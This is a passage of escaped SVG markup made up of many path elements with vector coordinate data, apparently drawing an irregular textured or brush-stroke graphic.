d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path 